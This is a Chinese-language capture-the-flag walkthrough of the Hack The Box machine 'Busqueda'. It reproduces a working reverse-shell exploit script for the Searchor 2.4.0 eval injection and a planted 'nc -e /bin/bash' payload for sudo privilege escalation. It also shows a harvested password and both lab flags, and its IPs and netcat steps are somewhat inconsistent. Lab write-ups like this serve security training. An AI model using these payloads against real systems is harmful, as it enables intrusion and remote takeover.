目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用ffuf对该域名进行路径FUZZ

直接使用浏览器访问靶机80端口主页面

直接到Github上寻找相关PoC、EXP

USER_FLAG：0f2686aebbdb4c728050281a6fb742cf

特权提升

ROOT_FLAG：dde68ef0288190408c0c3eb102398590

---

连接至HTB服务器并启动靶机

靶机IP：10.10.11.208

分配IP：10.10.16.22

---

使用nmap对靶机进行开放端口扫描

nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.208

攻击开放两个端口：22、80。尝试先访问下靶机80端口

curl -I http://10.10.11.208:80

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.208:80
HTTP/1.1 302 Found
Date: Fri, 01 Nov 2024 06:04:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://searcher.htb/
Content-Type: text/html; charset=iso-8859-1

直接被重定位到了域名：searcher.htb

那就绑定一下靶机IP与该域名

echo '10.10.11.208 searcher.htb' >> /etc/hosts

再次使用curl访问该域名

curl -I http://searcher.htb/

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://searcher.htb/  
HTTP/1.1 200 OK
Date: Fri, 01 Nov 2024 06:06:14 GMT
Server: Werkzeug/2.1.2 Python/3.10.6
Content-Type: text/html; charset=utf-8
Content-Length: 13519

---

使用ffuf对该域名进行路径FUZZ

ffuf -u http://searcher.htb/FUZZ -w ../dictionary/common.txt

直接使用浏览器访问靶机80端口主页面

拉到页面底部可以看到一个搜索框，还能选择搜索引擎

直接使用sqlmap尝试注入一下(虽然这个位置大概率没有和数据库交互)

sqlmap -r .\temp.txt --batch --dbs

结果也是不出意外，两个点应该都是直接转到了别的搜索引擎

---

在浏览器底部可以找到Searchor版本：2.4.0

点击它可以跳转到Github上的发布页面，我们点击这里查看它发行过的所有版本

在v2.4.2版本可以看到修复了一个漏洞，点击查看详情

查看该补丁修复漏洞详情

查看代码更改部分

@click.argument("query")
def search(engine, query, open, copy):
    try:
        url = eval(
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )
        url = Engine[engine].search(query, copy_url=copy, open_web=open)
        click.echo(url)
        searchor.history.update(engine, query, url)
        if open:

到了这里就不做代码审计了，需要学习的自行了解该py文件的代码注入方式

---

直接到Github上寻找相关PoC、EXP

#!/bin/bash -

default_port="9001"
port="${3:-$default_port}"
rev_shell_b64=$(echo -ne "bash  -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"

echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"

if [ -z "${evil_cmd##*$plus*}" ]
then
    evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi

if [ $# -ne 0 ]
then
    echo "[*] Input target is $1"
    echo "[*] Input attacker is $2:${port}"
    echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
    curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
else 
    echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example: 

./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
fi

本地侧使用nc开启监听

nc -lvnp 1425

运行EXP脚本

bash exploit.sh http://searcher.htb/ 10.10.14.11 1425

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                                    
listening on [any] 1425 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.208] 48886
bash: cannot set terminal process group (1639): Inappropriate ioctl for device
bash: no job control in this shell
svc@busqueda:/var/www/app$ whoami
whoami
svc

查看当前目录下所有文件

ls -a

svc@busqueda:/var/www/app$ ls -a
ls -a
.  ..  app.py  .git  templates

进入.git目录下

svc@busqueda:/var/www/app$ cd .git
cd .git
svc@busqueda:/var/www/app/.git$ ls
ls
branches        config       HEAD   index  logs     refs
COMMIT_EDITMSG  description  hooks  info   objects

查看config文件内容

svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

这里一串乱七八糟的字符串很像密码，尝试对当前用户(svc)进行SSH服务登录

ssh svc@10.10.11.208

账户：svc

密码：jh1usoih2bkjaspwe92

查找user_flag位置并查看user_flag内容

svc@busqueda:~$ find / -name 'user.txt' 2>/dev/null
/home/svc/user.txt
svc@busqueda:~$ cat /home/svc/user.txt
0f2686aebbdb4c728050281a6fb742cf

USER_FLAG：0f2686aebbdb4c728050281a6fb742cf

---

特权提升

查看当前用户可特权运行的命令

sudo -l

svc@busqueda:~$ sudo -l
[sudo] password for svc:
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

尝试直接复制该命令sudo执行

sudo /usr/bin/python3 /opt/scripts/system-checkup.py *

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

提示需要增加一个动作，那就full-checkup

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong

输出提示有错误，进入该py脚本目录下

cd /opt/scripts/

svc@busqueda:~$ cd /opt/scripts/
svc@busqueda:/opt/scripts$ ls
check-ports.py  full-checkup.sh  install-flask.sh  system-checkup.py

再次运行命令，发现可以成功运行了

这就意味着，参数full-checkup很有可能是直接调用当前目录下的full.checkup.sh文件

回到原用户SSH登陆后默认目录

cd ~

新建一个full-checkup.sh文件，并写入payload赋执行权限

echo -e '#!/bin/bash\nnc -lvnp 1425 -e /bin/bash' > full-checkup.sh;chmod +x full-checkup.sh

本地侧nc开启监听

nc -lvnp 1425

执行特权命令

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

获取root权限

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                    
listening on [any] 1425 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.208] 40774
root@busqueda:/home/svc# whoami
whoami
root

查找root_flag并查看内容

root@busqueda:/home/svc# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@busqueda:/home/svc# cat /root/root.txt
cat /root/root.txt
dde68ef0288190408c0c3eb102398590

ROOT_FLAG：dde68ef0288190408c0c3eb102398590